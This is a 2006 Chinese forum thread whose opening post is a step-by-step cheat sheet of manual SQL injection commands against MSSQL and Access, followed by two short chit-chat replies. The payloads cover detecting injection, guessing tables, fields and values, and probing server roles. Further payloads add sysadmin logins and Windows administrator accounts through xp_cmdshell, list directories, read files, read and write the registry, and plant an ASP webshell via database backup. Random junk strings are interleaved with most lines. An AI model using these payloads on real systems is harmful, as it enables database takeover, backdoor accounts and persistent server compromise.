社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4122阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 5H,(\Xd  
  2.初步判断是否是mssql ;and user>0 yZ]?-7  
Qwp2h"t`  
  3.注入参数是字符'and [查询条件] and ''=' ff=RKKnN  
k5 *Z@a  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' A|GsbRuy  
,c 0]r;u!  
  5.判断数据库系统 5bd4]1 gj  
VV sE]7P ]  
  ;and (select count(*) from sysobjects)>0 mssql Lhrlz,1  
;9q$eK%d  
  ;and (select count(*) from msysobjects)>0 access O-box?  
Wys$#pJ  
#4!f/dWJp  
l<'}`  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 $`R=Q  
U[:=7UABU?  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 +{}p(9w@  
D |fo:Xp,  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 :Zo^Uc:*w  
b< []z,  
  9.(1)猜字段的ascii值(access) 1#8~@CQ ::  
,b?G]WQrHs  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 :a:m>S<~  
+n)bWB%  
  (2)猜字段的ascii值(mssql) bJkFCI/  
s@Loax6@B  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 AP8J28I  
;iJ}[HUo  
  10.测试权限结构(mssql) {hm-0Q  
_X@ Q`d  
%eGD1.R  
e@& 2q{Gi=  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- -qLNs_ _k  
zE7)4!  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- qQS&K%F  
. ywVGBvJ  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 1KJ[&jS ]  
G {a;s-OA3  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- Yi19VU|/  
G B>T3l"  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- akwS;|SZ  
h(^[WSa  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- maV*+!\  
"c![s%  
  ;and 1=(select IS_MEMBER('db_owner'));-- 9Z3Vf[n5\  
eO{2rV45O  
Wck WX]};S  
pwF])uf*{\  
  11.添加mssql和系统的帐户 Hq,N OP  
nQn=zbZ3  
  ;exec master.dbo.sp_addlogin username;-- 9A}y^=!`  
  ;exec master.dbo.sp_password null,username,password;-- Xj:\B] v]  
wB<cW>6  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- {P%\& \{F  
("=24R=a  
  ;exec master.dbo.xp_cmdshell 'net user username password ~Q=^YZgn8  
ESe$6)P  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- KnK\X>:  
v,US4C|^3i  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- g=Nde2d?  
;3Q3!+%j  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- P+0 -h  
p#gf^Y5  
cWI7];/d;  
5)gC<  
  12.(1)遍历目录 a JQ_V  
2}5@: cwR+  
  ;create table dirs(paths varchar(100), id int) YCyh+%Q(  
mH'om SCz  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' (]5gYi  
s]xn&rd_  
  ;and (select top 1 paths from dirs)>0 |s!n7%|,7  
8=mx5Gwz-  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Nm3CeU  
\r &(l1R  
'tVe#oI  
Wa%p+(\<uB  
  (2)遍历目录 X C '|  
<h`}I3Ao  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- =z}M(<G  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 T`Xz*\}Zb  
>~T2MlRux  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 MnptC 1N  
yeV|j\TJI.  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ?jnbm'~S  
\K:?#07Wj4  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 "}uV=y  
KoFWI_(b  
YRj"]= 5N  
Wix4se1Ac  
  13.mssql中的存储过程 @EH@_EwYV  
85+w\KuEY  
  xp_regenumvalues 注册表根键, 子键 ,6wGdaMR  
U#4>GO;A  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 a!;K+wL >  
1c$c e+n~  
  xp_regread 根键,子键,键值名 AHLXmQl  
Lx3`.F\mG  
  ;exec xp_regread _147d5  
CW~c<,"  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ;GZ'Rb  
@DyMq3Gt?&  
  xp_regwrite 根键,子键, 值名, 值类型, 值 g<i>252>  
[ _&z+  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 2c5)pIVEy  
8ZDWaq8^2N  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 !:1BuiL  
F>5)Clq  
  xp_regdeletevalue 根键,子键,值名 <ceJ!"L  
t;lK=m|  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 4n2*2 yTg  
44UN*_qG  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 {CGk9g" `  
ymA8`k5>@  
9 NqZ&S  
Vc "+|^  
  14.mssql的backup创建webshell -4S4I  
z HvW@A'F  
  use model .H5^N\V|  
0Y*Ag ,S  
  create table cmd(str image); v0+$d\mP4<  
alZ83^YN'  
  insert into cmd(str) values (''); YU1z\pK  
 OF`:);  
  backup database model to disk='c:\l.asp'; aOW$H:b  
5K$d4KT  
sHHu<[psM  
vNAQ/Q  
  15.mssql内置函数 MNKY J  
Qr[".>+  
  ;and (select @@version)>0 获得Windows的版本号 ]DI%7kw'  
;vgaFc]  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa \B8[UZA.&  
2!}rH w  
  ;and (select user_name())>0 爆当前系统的连接用户 .IORvP-M&  
f_ > lz  
  ;and (select db_name())>0 得到当前连接的数据库 c)17[9"  
R9%"Kxm  
N1'$;9 c  
'6Yx03t  
  16.简洁的webshell us^J! s7  
c nV2}U/\  
  use model '_o(I  
< #7j~<  
  create table cmd(str image); Br"K{g?  
0u ,nSvch  
  insert into cmd(str) values (''); hu-6V="^9  
A,%NdM;t=5  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
10+5=?,请输入中文答案:十五